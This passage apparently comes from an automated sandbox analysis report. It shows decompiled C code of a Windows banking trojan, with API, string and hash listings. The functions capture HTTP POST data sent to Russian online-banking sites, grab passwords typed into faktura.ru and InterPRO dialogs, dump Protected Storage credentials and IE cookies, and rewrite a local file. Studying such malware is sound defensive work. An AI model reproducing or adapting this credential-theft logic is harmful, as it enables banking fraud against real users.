        										 *0x414ed8(0x414f68);
        										E0040CEFA(_t158, _a4, _t168,  &_v12,  &_v20);
        										 *0x414edc(0x414f68);
        									}
        									_v8 = 0x3ff;
        									if(HttpQueryInfoA(_t168[0x420], 0x80000023,  &_v1372,  &_v8, 0) == 0 || _v8 == 0) {
        										_v8 = 1;
        										_v1372 = 0x2d;
        									}
        									 *((char*)(_t169 + _v8 - 0x558)) = 0;
        									_t164 = E0040F5EA(_t168[0x400], _t168);
        									_t96 = 0x40220d;
        									_t148 = _t143;
        									if(_t143 == 0) {
        										_t148 = 0x40220d;
        									}
        									_t203 = _v12;
        									if(_v12 != 0) {
        										_t96 = _v12;
        									}
        									_push(_t148);
        									_push(_t96);
        									_push( &_v1372);
        									E0041352B(_t148, _t158, _t203, _v16, _t164, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t168);
        									E0040F15E(_t164);
        									E0040F15E(_v12);
        									E0040F15E(_t143);
        									goto L61;
        								}
        								goto L50;
        							}
        						}
        						_t107 = _t86 + 1;
        						if(_t86 + 1 == 0) {
        							goto L61;
        						}
        						_t143 = E0040F14B(_t107);
        						if(_t143 == 0) {
        							goto L61;
        						}
        						E0040F19A(_t143, _t168[0x418], _t168[0x41c]);
        						_t110 = 0;
        						if(_t168[0x41c] <= 0) {
        							goto L47;
        						} else {
        							goto L42;
        						}
        						do {
        							L42:
        							_t149 =  *((intOrPtr*)(_t110 + _t143));
        							if(_t149 != 0x26) {
        								__eflags = _t149 - 0x2b;
        								if(_t149 == 0x2b) {
        									 *((char*)(_t110 + _t143)) = 0x20;
        								}
        							} else {
        								 *((char*)(_t110 + _t143)) = 0xa;
        							}
        							_t110 = _t110 + 1;
        						} while (_t110 < _t168[0x41c]);
        						goto L47;
        					} else {
        						if(_t168[0x404] != 0x50 || _t168[0x41c] < 5) {
        							goto L61;
        						} else {
        							_v8 = 0x31;
        							if(HttpQueryInfoA(_t168[0x420], 0x80000001,  &_v80,  &_v8, 0) == 0) {
        								goto L61;
        							}
        							_t150 =  *0x414ad4; // 0x241f5a8
        							_t158 = _v8;
        							if(E0040F65D( &_v80 | 0xffffffff,  *((intOrPtr*)(_t150 + 0x128)), _v8,  &_v80) != 0) {
        								goto L61;
        							}
        							goto L38;
        						}
        					}
        				}
        				_t166 = E004124A2( &_v8, __edx, _t172, _a4, 0x4e26, 0x20000000);
        				_v20 = _t166;
        				if(_t166 == 0) {
        					goto L25;
        				}
        				if(E0040F94A(_t121, _v8) == 0) {
        					L24:
        					E0040F15E(_v20);
        					if(_v16 == 0) {
        						goto L61;
        					}
        					goto L25;
        				} else {
        					goto L3;
        				}
        				do {
        					L3:
        					_t8 = _t166 + 1; // 0x1
        					_t154 = _t8;
        					if( *_t154 == 0) {
        						goto L12;
        					}
        					_t125 =  *_t166;
        					_t145 = 0;
        					if(_t125 != 0x2d) {
        						__eflags = _t125 - 0x40;
        						if(_t125 != 0x40) {
        							__eflags = _t125 - 0x21;
        							if(_t125 != 0x21) {
        								goto L11;
        							}
        							_t145 = 1;
        						} else {
        							_t145 = 2;
        						}
        						goto L10;
        					} else {
        						_t145 = 3;
        						L10:
        						_t166 = _t154;
        						L11:
        						_t156 = _t166;
        						_t159 = E0040F637(_t166);
        						if(E0040A3D4(_t166, _t126, _t168, _t168[0x400], 0, 0, 2) != 0) {
        							__eflags = _t145 - 1;
        							_v16 = (0 | _t145 != 0x00000001) & 0x0000ffff;
        							__eflags = _t145 - 3;
        							if(_t145 != 3) {
        								__eflags = _t145 - 2;
        								if(_t145 != 2) {
        									goto L24;
        								}
        								_t160 = 0x3c;
        								E0040F21C( &_v88,  &_v88, 0, _t160);
        								_v72 =  &_v348;
        								_v88 = _t160;
        								_v68 = 0x103;
        								_t135 = InternetCrackUrlA(_t168, _t168[0x400], 0,  &_v88);
        								__eflags = _t135;
        								if(_t135 == 0) {
        									L20:
        									_t146 = 0;
        									__eflags = 0;
        									L21:
        									_t136 = 0x14;
        									 *0x4147c8 = _t136;
        									_t137 = E0040F15E( *0x4147c0);
        									__eflags = _t146;
        									if(_t146 == 0) {
        										 *0x4147c0 = 0;
        									} else {
        										 *0x4147c0 = E0040F5EA(_t137 | 0xffffffff, _t146);
        									}
        									goto L24;
        								}
        								__eflags = _v68;
        								if(_v68 == 0) {
        									goto L20;
        								}
        								_t146 =  &_v348;
        								goto L21;
        							}
        							E0040C692(_t156, _t159, _t168, _t168);
        							return 0;
        						}
        					}
        					L12:
        					_t166 = E0040F968(_t166, 1);
        				} while (_t166 != 0);
        				goto L24;
        			}

        APIs
        • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040BBEF
        • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BD1A
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040BDEA
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040BE02
        • HttpQueryInfoA.WININET(?,80000023,?,00000073,00000000), ref: 0040BE27
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
        • String ID: %SReferer: %S%SData:%S$-$1$ageW$essAsUserA$https://bc.nsk.*.ru/*$https://ibank*.ru/*$https://www.faktura.ru/enter.jsp?site=$;@
        • API String ID: 1405552099-4101882370
        • Opcode ID: 7f5ff46773af2bcc4ba2a149951e76580bed8483634e46d37875d0541bbcfcd1
        • Instruction ID: baabd71f9d136b36cd8fcaa04f02b05750e3c39ad6ed55fcf7443dc5d36dbf6c
        • Opcode Fuzzy Hash: 7f5ff46773af2bcc4ba2a149951e76580bed8483634e46d37875d0541bbcfcd1
        • Instruction Fuzzy Hash: 34B1D270900648AAEB319BA0CC85BEF7BB9EF51304F10407AE151B62D1C77D6A85CB9D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411AF9() {
        				struct HINSTANCE__* _t2;
        				_Unknown_base(*)()* _t7;
        				void* _t9;
        				intOrPtr _t11;
        				intOrPtr _t13;
        				intOrPtr _t14;
        				intOrPtr _t15;
        
        				_t11 =  *0x415fb0; // 0x656d614e
        				if(_t11 != 0) {
        					L9:
        					 *0x415fb0 =  *0x415fb0 + 1;
        					return 1;
        				} else {
        					_t2 = LoadLibraryA("cabinet.dll");
        					 *0x415fac = _t2;
        					if(_t2 == 0) {
        						L8:
        						return 0;
        					} else {
        						 *0x415f98 = GetProcAddress(_t2, "FCICreate");
        						 *0x415f9c = GetProcAddress( *0x415fac, "FCIAddFile");
        						 *0x414fa4 = GetProcAddress( *0x415fac, "FCIFlushCabinet");
        						_t7 = GetProcAddress( *0x415fac, "FCIDestroy");
        						 *0x415fa0 = _t7;
        						_t13 =  *0x415f98; // 0x75476574
        						if(_t13 == 0) {
        							L7:
        							FreeLibrary( *0x415fac);
        							goto L8;
        						} else {
        							_t14 =  *0x415f9c; // 0x6469
        							if(_t14 == 0) {
        								goto L7;
        							} else {
        								_t15 =  *0x414fa4; // 0x566d756e
        								if(_t15 == 0 || _t7 == 0) {
        									goto L7;
        								} else {
        									_t9 = HeapCreate(0, 0x80000, 0);
        									 *0x414fa0 = _t9;
        									if(_t9 != 0) {
        										goto L9;
        									} else {
        										goto L7;
        									}
        								}
        							}
        						}
        					}
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(cabinet.dll,00000001,00411BE8,00000000,00411EC2,00000001,00000001,00000000,?,00413656,?,?,00000001,?), ref: 00411B0D
        • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411B26
        • GetProcAddress.KERNEL32(FCIAddFile), ref: 00411B3C
        • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411B52
        • GetProcAddress.KERNEL32(FCIDestroy), ref: 00411B68
        • HeapCreate.KERNEL32(00000000,00080000,00000000,?,00413656,?,?,00000001,?), ref: 00411B96
        • FreeLibrary.KERNEL32(?,00413656,?,?,00000001,?), ref: 00411BAB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$Library$CreateFreeHeapLoad
        • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$RegEnumValueA$cabinet.dll$playName
        • API String ID: 2040708800-1429684230
        • Opcode ID: 7574706cf9ff557ecdf2496891627147f4999fe1e85c6bee8f6e72a309c4d430
        • Instruction ID: 998491fea5dfdfa671de0ec59278035e6ed8303dcb8bae0c70ff3513910943ef
        • Opcode Fuzzy Hash: 7574706cf9ff557ecdf2496891627147f4999fe1e85c6bee8f6e72a309c4d430
        • Instruction Fuzzy Hash: 091187B4945A20DFCB225FA0FC09ADA7B74BB88B11354C537FA19A62B4D7381582CF4D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 60%
        			E00405718(void* __ecx, struct HWND__* _a4, int _a8) {
        				char _v104;
        				struct HWND__* _t11;
        				struct HWND__* _t12;
        				struct HWND__* _t13;
        				struct HWND__* _t14;
        				struct HWND__* _t15;
        				int _t24;
        				void* _t27;
        				void* _t28;
        				struct HWND__* _t30;
        				intOrPtr _t33;
        
        				_t27 = __ecx;
        				_t30 = _a4;
        				_t33 =  *0x41479e; // 0x74
        				if(_t33 == 0) {
        					__eflags =  *0x41479f; // 0x69
        					if(__eflags == 0) {
        						E0040C34D(_t30, _t28, _a8);
        					} else {
        						_t11 = GetDlgItem(_t30, 1);
        						__eflags = _t11;
        						if(_t11 != 0) {
        							_t12 = GetDlgItem(_t30, 2);
        							__eflags = _t12;
        							if(_t12 != 0) {
        								_t13 = GetDlgItem(_t30, 0xcb);
        								__eflags = _t13;
        								if(_t13 != 0) {
        									_t14 = GetDlgItem(_t30, 0xf0);
        									__eflags = _t14;
        									if(_t14 != 0) {
        										_t15 = GetDlgItem(_t30, 0xf1);
        										__eflags = _t15;
        										if(_t15 != 0) {
        											__eflags = GetDlgItemTextA(_t30, 0xcb,  &_v104, 0x63) - 1;
        											if(__eflags > 0) {
        												_push( &_v104);
        												_push(L"faktura.ru data\n\nPassword: %S");
        												goto L14;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        				} else {
        					if(GetDlgItem(_t30, 1) != 0 && GetDlgItem(_t30, 2) != 0 && GetDlgItem(_t30, 0x65) != 0) {
        						_t24 = GetDlgItemTextA(_t30, 0x66,  &_v104, 0x63);
        						_t37 = _t24 - 1;
        						if(_t24 > 1) {
        							_push( &_v104);
        							_push(L"InterPRO Key password: %S");
        							L14:
        							_push(0);
        							_push(0);
        							_push(0xc8);
        							E0041352B(_t27, _t28, _t37);
        						}
        					}
        				}
        				return EndDialog(_t30, _a8);
        			}

        APIs
        • GetDlgItem.USER32(?,00000001), ref: 00405731
        • GetDlgItem.USER32(?,00000002), ref: 00405742
        • GetDlgItem.USER32(?,00000065), ref: 00405753
        • GetDlgItemTextA.USER32(?,00000066,?,00000063), ref: 0040576A
          • Part of subcall function 0040C34D: GetWindowTextW.USER32(?,?,00000064), ref: 0040C37B
          • Part of subcall function 0040C34D: StrStrW.SHLWAPI(?,?,?,00000000), ref: 0040C390
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000001), ref: 0040C3A1
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000002), ref: 0040C3B2
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000142), ref: 0040C3C6
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000396), ref: 0040C3D6
          • Part of subcall function 0040C34D: GetDlgItemTextA.USER32(?,00000124,?,0000000D), ref: 0040C3EC
          • Part of subcall function 0040C34D: GetDlgItemTextA.USER32(?,00000125,?,00000032), ref: 0040C40A
          • Part of subcall function 0040C34D: lstrcpy.KERNEL32(rlappedAccessResults,?), ref: 0040C422
          • Part of subcall function 0040C34D: lstrcpy.KERNEL32(ults,?), ref: 0040C434
        • GetDlgItem.USER32(?,00000001), ref: 0040578F
        • GetDlgItem.USER32(?,00000002), ref: 0040579C
        • GetDlgItem.USER32(?,000000CB), ref: 004057AD
        • GetDlgItem.USER32(?,000000F0), ref: 004057BD
        • GetDlgItem.USER32(?,000000F1), ref: 004057CD
        • GetDlgItemTextA.USER32(?,000000CB,?,00000063), ref: 004057DF
        • EndDialog.USER32(?,?), ref: 00405812
        Strings
        • InterPRO Key password: %S, xrefs: 0040577D
        • faktura.ru dataPassword: %S, xrefs: 004057EE
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Item$Text$lstrcpy$DialogWindow
        • String ID: InterPRO Key password: %S$faktura.ru dataPassword: %S
        • API String ID: 3374916993-340622018
        • Opcode ID: e8bf784995addf7507c27900898e33d4082b556ea7dcb9a42c3a9e2d94f816d8
        • Instruction ID: 0586d66cce4394d28ea56948a0ce184660821f1b39f7dfa7ce38c5a733cb4589
        • Opcode Fuzzy Hash: e8bf784995addf7507c27900898e33d4082b556ea7dcb9a42c3a9e2d94f816d8
        • Instruction Fuzzy Hash: 89217C32381A14BAE6216B608D49FEB365DDF42B80F248436F908F91D0DB79CA118A7D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00407126(void* _a4) {
        				void* _v8;
        				long _v12;
        				long _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				void* _v28;
        				char* _v32;
        				intOrPtr* _v36;
        				void* _v40;
        				short _v560;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t71;
        				void* _t75;
        				long _t76;
        				intOrPtr _t83;
        				char* _t85;
        				signed int _t103;
        				long _t104;
        				signed int _t111;
        				intOrPtr _t112;
        				intOrPtr* _t113;
        				intOrPtr* _t114;
        				intOrPtr _t116;
        				intOrPtr _t117;
        				intOrPtr _t118;
        				intOrPtr _t119;
        				intOrPtr _t122;
        				void* _t128;
        				intOrPtr _t136;
        				void* _t137;
        				void* _t144;
        				void* _t146;
        				void* _t148;
        				void* _t149;
        				signed int _t151;
        				void* _t152;
        				intOrPtr* _t153;
        
        				 *0x414b58(0,  &_v560, 0x25, 1);
        				_t71 =  *0x414ad4; // 0x241f5a8
        				PathCombineW( &_v560,  &_v560,  *(_t71 + 0x158));
        				_t75 = CreateFileW( &_v560, 0xc0000000, 1, 0, 4, 0, 0);
        				_t149 = _t75;
        				_v8 = _t149;
        				if(_t149 == 0xffffffff) {
        					return _t75;
        				}
        				_t76 = GetFileSize(_t149, 0);
        				_v12 = _t76;
        				if(_t76 == 0) {
        					L59:
        					return CloseHandle(_v8);
        				}
        				_t144 = E0040F14B(_t76);
        				_v40 = _t144;
        				if(_t144 == 0) {
        					L58:
        					goto L59;
        				}
        				if(ReadFile(_t149, _t144, _v12,  &_v12, 0) == 0) {
        					L57:
        					E0040F15E(_v40);
        					goto L58;
        				}
        				_t83 = E0040A6D2(_v12, _t144,  &_v12);
        				_v24 = _t83;
        				if(_t83 == 0) {
        					goto L57;
        				} else {
        					_v28 = _a4;
        					while(1) {
        						_t85 = E0040F968(_v28, 1);
        						_v32 = _t85;
        						if(_t85 == 0) {
        							break;
        						} else {
        							if( *_t85 == 0x21) {
        								_v32 = _t85 + 1;
        							}
        						}
        						_t111 = 0;
        						_v20 = 0;
        						if(_v12 <= 0) {
        							L41:
        							_t112 = E0040F968(_v28, 2);
        							_v28 = _t112;
        							if(_t112 != 0) {
        								continue;
        							}
        							break;
        						} else {
        							goto L10;
        						}
        						do {
        							L10:
        							_t113 = _v24 + _t111 * 4;
        							_v36 = _t113;
        							_t114 =  *_t113;
        							if(_t114 != 0) {
        								_t153 = _t114;
        								while(1) {
        									_t116 =  *_t153;
        									if(_t116 != 0x20 && _t116 != 9) {
        										break;
        									}
        									_t153 = _t153 + 1;
        								}
        								_t117 =  *_t153;
        								if(_t117 != 0x23 && _t117 != 0xd && _t117 != 0xa && _t117 != 0) {
        									while(_t117 != 9) {
        										if(_t117 == 0x20 || _t117 == 9) {
        											break;
        										} else {
        											if(_t117 == 0) {
        												goto L40;
        											}
        											_t153 = _t153 + 1;
        											_t117 =  *_t153;
        											continue;
        										}
        									}
        									if( *_t153 == 0) {
        										goto L40;
        									} else {
        										goto L26;
        									}
        									while(1) {
        										L26:
        										_t118 =  *_t153;
        										if(_t118 != 9 && _t118 != 0x20) {
        											break;
        										}
        										_t153 = _t153 + 1;
        									}
        									_t119 =  *_t153;
        									if(_t119 != 0x23 && _t119 != 0xd && _t119 != 0xa && _t119 != 0) {
        										_t148 = E0040F637(_v32);
        										if(E0040F65D(_t120, _t153, _t148, _v32) == 0) {
        											_t122 =  *((intOrPtr*)(_t148 + _t153));
        											if(_t122 == 0x20 || _t122 == 0xd || _t122 == 0xa || _t122 == 0x23 || _t122 == 0) {
        												E0040F15E( *_v36);
        												 *_v36 = 0;
        											}
        										}
        									}
        								}
        							}
        							L40:
        							_t111 = _v20 + 1;
        							_v20 = _t111;
        						} while (_t111 < _v12);
        						goto L41;
        					}
        					_v20 = _v20 | 0xffffffff;
        					SetFilePointer(_v8, 0, 0, 0);
        					SetEndOfFile(_v8);
        					_t151 = 0;
        					if(_v12 <= 0) {
        						L46:
        						_t146 = _a4;
        						_t152 = "\r\n";
        						do {
        							_t128 = E0040F968(_t146, 1);
        							if(_t128 == 0) {
        								break;
        							}
        							if( *_t128 != 0x21) {
        								if(_t146 == _a4) {
        									_t103 = _v20;
        									if(_t103 != 0xffffffff) {
        										_t136 =  *((intOrPtr*)(_v24 + _t103 * 4));
        										_t104 = E0040F637(_t136);
        										_v16 = _t104;
        										if(_t104 != 0 &&  *((char*)(_t136 + _t104 - 1)) != 0xa) {
        											WriteFile(_v8, _t152, 2,  &_v16, 0);
        										}
        									}
        								}
        								WriteFile(_v8, _t146, E0040F637(_t146),  &_v16, 0);
        								WriteFile(_v8, " ", 1,  &_v16, 0);
        								WriteFile(_v8, _t128, E0040F637(_t128),  &_v16, 0);
        								WriteFile(_v8, _t152, 2,  &_v16, 0);
        							}
        							_t146 = E0040F968(_t146, 2);
        						} while (_t146 != 0);
        						FlushFileBuffers(_v8);
        						E0040F17A(_v12, _v24);
        						goto L57;
        					} else {
        						goto L43;
        					}
        					do {
        						L43:
        						_t137 =  *(_v24 + _t151 * 4);
        						if(_t137 != 0) {
        							_v20 = _t151;
        							WriteFile(_v8, _t137, E0040F637(_t137),  &_v16, 0);
        						}
        						_t151 = _t151 + 1;
        					} while (_t151 < _v12);
        					goto L46;
        				}
        			}

        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,00000000,01020716), ref: 0040713F
        • PathCombineW.SHLWAPI(?,?,?), ref: 00407158
        • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000000,00000000), ref: 00407171
        • GetFileSize.KERNEL32(00000000,00000000), ref: 00407187
        • CloseHandle.KERNEL32(?), ref: 0040740F
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 004071B5
        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 004072EA
        • SetEndOfFile.KERNEL32(?), ref: 004072F3
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040731C
        • WriteFile.KERNEL32(?,004020A0,00000002,?,00000000,00000001), ref: 0040737E
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,00000001), ref: 00407396
        • WriteFile.KERNEL32(?,0040208C,00000001,?,00000000), ref: 004073AC
        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073C4
        • WriteFile.KERNEL32(?,004020A0,00000002,?,00000000), ref: 004073D6
        • FlushFileBuffers.KERNEL32(?,00000001), ref: 004073F2
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Write$Path$AllocateBuffersCloseCombineCreateFlushFolderHandleHeapPointerReadSizeSpecial
        • String ID:
        • API String ID: 3438174515-0
        • Opcode ID: 9a247c4bc7344257f447d6f433be9b43e40eb419db6b05d0f766e1176a666fb9
        • Instruction ID: b1da6c2c6bea634a31ecf0bbe143e4f366292d7a83a1fa481e9b416ce26f68f7
        • Opcode Fuzzy Hash: 9a247c4bc7344257f447d6f433be9b43e40eb419db6b05d0f766e1176a666fb9
        • Instruction Fuzzy Hash: 14916E71D04209AFDF219BA4CC85BEE7BB9AB45304F1440BAF941B72D0C7786D42DB6A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E00404FFB() {
        				int _v24;
        				int _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				char _v68;
        				char _v72;
        				int _v76;
        				intOrPtr _v80;
        				char _v84;
        				char _v88;
        				int _v92;
        				char _v100;
        				void* _v104;
        				char _v108;
        				intOrPtr* _v116;
        				intOrPtr* _v128;
        				intOrPtr* _v132;
        				char _v136;
        				intOrPtr* _v144;
        				char _v148;
        				char _v164;
        				intOrPtr* _v168;
        				intOrPtr* _v172;
        				char _v180;
        				intOrPtr* _v188;
        				char _v196;
        				int _v204;
        				char _v208;
        				WCHAR* _v212;
        				intOrPtr _v216;
        				char _v224;
        				short _v232;
        				int _v236;
        				intOrPtr _v240;
        				short _v244;
        				short* _v252;
        				short _v256;
        				char* _v260;
        				short _v264;
        				intOrPtr _v272;
        				void* __edi;
        				_Unknown_base(*)()* _t123;
        				intOrPtr _t126;
        				intOrPtr _t133;
        				intOrPtr* _t140;
        				intOrPtr* _t142;
        				intOrPtr* _t144;
        				intOrPtr* _t146;
        				short _t147;
        				intOrPtr* _t148;
        				short _t149;
        				intOrPtr* _t150;
        				short _t151;
        				intOrPtr* _t152;
        				short _t153;
        				WCHAR* _t155;
        				short _t156;
        				short _t157;
        				char* _t161;
        				int _t162;
        				short _t165;
        				char* _t167;
        				signed char _t178;
        				signed int _t179;
        				short* _t181;
        				intOrPtr* _t183;
        				intOrPtr* _t185;
        				intOrPtr* _t187;
        				short _t200;
        				char _t203;
        				short _t221;
        				short _t227;
        				void* _t228;
        				void* _t229;
        				short* _t230;
        				short _t233;
        				short _t235;
        
        				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
        				_t233 = 0;
        				_v84 = 0;
        				_v36 = 0x10;
        				_v32 = 2;
        				_v28 = 0;
        				_v24 = 0;
        				_v92 = 0;
        				_v76 = 0;
        				if(_t123 == 0) {
        					L46:
        					_v68 = 0;
        					_v72 = 0;
        					if(E00404EA2(_t192,  &_v72, 1,  &_v68) != 0) {
        						_t226 = _v72;
        						if(_v72 > 0) {
        							_t133 = E0040F117(_t226 + _t233 + 0x32, _v92);
        							if(_t133 != 0) {
        								_v92 = _t133;
        								E0040F19A(E0040F19A(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
        							}
        							E0040F15E(_v68);
        						}
        					}
        					_t126 = _v92;
        					_t249 = _v92;
        					if(_v92 == 0) {
        						_t126 = "Empty";
        					}
        					E0041352B(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
        					E0040F15E(_v92);
        					E00404EA2(_t192, 0, 0, 0);
        					E004053C0(1);
        					return 1;
        				}
        				_push(0);
        				_push(0);
        				_push(0);
        				_t192 =  &_v84;
        				_push( &_v84);
        				if( *_t123() != 0) {
        					goto L46;
        				}
        				_t140 = _v100;
        				if(_t140 == 0) {
        					goto L46;
        				}
        				_t208 =  &_v72;
        				_push( &_v72);
        				_push(0);
        				_push(0);
        				_push(_t140);
        				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
        					L45:
        					_t142 = _v116;
        					_t192 =  *_t142;
        					 *((intOrPtr*)( *_t142 + 8))(_t142);
        					goto L46;
        				} else {
        					while(1) {
        						_t144 = _v88;
        						_push(0);
        						_t208 =  &_v84;
        						_push( &_v84);
        						_push(1);
        						_push(_t144);
        						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
        							break;
        						}
        						__eflags = _v100 - 0xe161255a;
        						if(_v100 != 0xe161255a) {
        							continue;
        						}
        						_t146 = _v132;
        						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
        						__eflags = _t147;
        						if(_t147 != 0) {
        							continue;
        						}
        						while(1) {
        							_t148 = _v128;
        							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
        							__eflags = _t149;
        							if(_t149 != 0) {
        								break;
        							}
        							_t150 = _v168;
        							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
        							__eflags = _t151;
        							if(_t151 != 0) {
        								continue;
        							}
        							_v188 = 0;
        							_v204 = 0;
        							while(1) {
        								_t152 = _v172;
        								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
        								__eflags = _t153;
        								if(_t153 != 0) {
        									break;
        								}
        								_t227 = StrStrW(_v212, L":StringData");
        								__eflags = _t227;
        								if(_t227 == 0) {
        									continue;
        								}
        								__eflags =  *(_t227 + 0x16);
        								if( *(_t227 + 0x16) != 0) {
        									continue;
        								}
        								__eflags = _t227 - _v216;
        								if(_t227 == _v216) {
        									continue;
        								}
        								_t155 = _v212;
        								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
        								__eflags = _t156;
        								if(_t156 != 0) {
        									continue;
        								}
        								_t157 = _v244;
        								__eflags = _t157 - 2;
        								if(_t157 <= 2) {
        									continue;
        								}
        								__eflags = _t157;
        								if(_t157 == 0) {
        									continue;
        								}
        								_t221 = E0040F14B(_t157);
        								_v232 = _t221;
        								__eflags = _t221;
        								if(_t221 == 0) {
        									continue;
        								}
        								 *_t227 = 0;
        								_t200 = _v244;
        								_t161 =  &(_v260[_t200]);
        								_t235 = 0;
        								_t228 = 0;
        								__eflags =  *(_t161 - 1);
        								if( *(_t161 - 1) != 0) {
        									L29:
        									__eflags = _t200;
        									if(_t200 <= 0) {
        										L34:
        										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
        										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
        											_t235 = _t235 - 1;
        											__eflags = _t235;
        										}
        										_t162 = E0040F649(_v252);
        										_v236 = _t162;
        										_t229 = _t162 + _t235 + _v240;
        										_t60 = _t229 + 6; // 0x6
        										_t165 = E0040F117(_t60, _v256);
        										_v264 = _t165;
        										__eflags = _t165;
        										if(_t165 != 0) {
        											_v256 = _t165;
        											_t167 = _t165 + _v240;
        											_v260 = _t167;
        											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
        											_v260 =  &(_v260[_v236]);
        											 *_v260 = 0x20;
        											_v260[1] = 0x3d;
        											_v260[2] = 0x20;
        											_v260 =  &(_v260[3]);
        											E0040F19A(_v260, _v232, _t235);
        											 *((char*)(_t235 + _v272)) = 0xd;
        											 *((char*)(_t235 + _v272 + 1)) = 0xa;
        											_t230 = _t229 + 5;
        											__eflags = _t230;
        											 *((char*)(_t235 + _v272 + 2)) = 0;
        											_v252 = _t230;
        										}
        										E0040F15E(_v232);
        										_t233 = _v244;
        										continue;
        									} else {
        										goto L30;
        									}
        									do {
        										L30:
        										_t178 =  *((intOrPtr*)(_t228 + _v260));
        										__eflags = _t178;
        										if(_t178 != 0) {
        											_t179 = _t178 & 0x000000ff;
        										} else {
        											_t179 = 0x7c;
        										}
        										 *(_t228 + _t221) = _t179;
        										_t228 = _t228 + 1;
        										_t235 = _t235 + 1;
        										__eflags = _t228 - _v244;
        									} while (_t228 < _v244);
        									goto L34;
        								}
        								__eflags =  *(_t161 - 2);
        								if( *(_t161 - 2) != 0) {
        									goto L29;
        								}
        								__eflags = _t200;
        								if(_t200 <= 0) {
        									goto L34;
        								} else {
        									goto L20;
        								}
        								do {
        									L20:
        									_t181 =  &(_v260[_t228]);
        									_t203 =  *_t181;
        									__eflags = _t203;
        									if(_t203 != 0) {
        										__eflags = _t181[0];
        										L24:
        										if(__eflags <= 0) {
        											 *(_t235 + _t221) = _t203;
        										} else {
        											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
        											_t221 = _v232;
        										}
        										goto L27;
        									}
        									__eflags = _t181[0];
        									if(__eflags != 0) {
        										goto L24;
        									}
        									 *(_t235 + _t221) = 0x7c;
        									L27:
        									_t228 = _t228 + 2;
        									_t235 = _t235 + 1;
        									__eflags = _t228 - _v244;
        								} while (_t228 < _v244);
        								goto L34;
        							}
        							_t183 = _v188;
        							 *((intOrPtr*)( *_t183 + 8))(_t183);
        						}
        						_t185 = _v144;
        						 *((intOrPtr*)( *_t185 + 8))(_t185);
        					}
        					_t187 = _v104;
        					 *((intOrPtr*)( *_t187 + 8))(_t187);
        					goto L45;
        				}
        			}

        APIs
        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405011
        • GetProcAddress.KERNELBASE(00000000), ref: 00405018
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
        • API String ID: 2574300362-834128494
        • Opcode ID: ead2044e914ad227abff8d213b2a3b49334e44607f3eaf238978758788b6d24c
        • Instruction ID: 248de5676cc0d62576f4b4751e1ee90455c92a47b7ce2d8bebb8d859305aa298
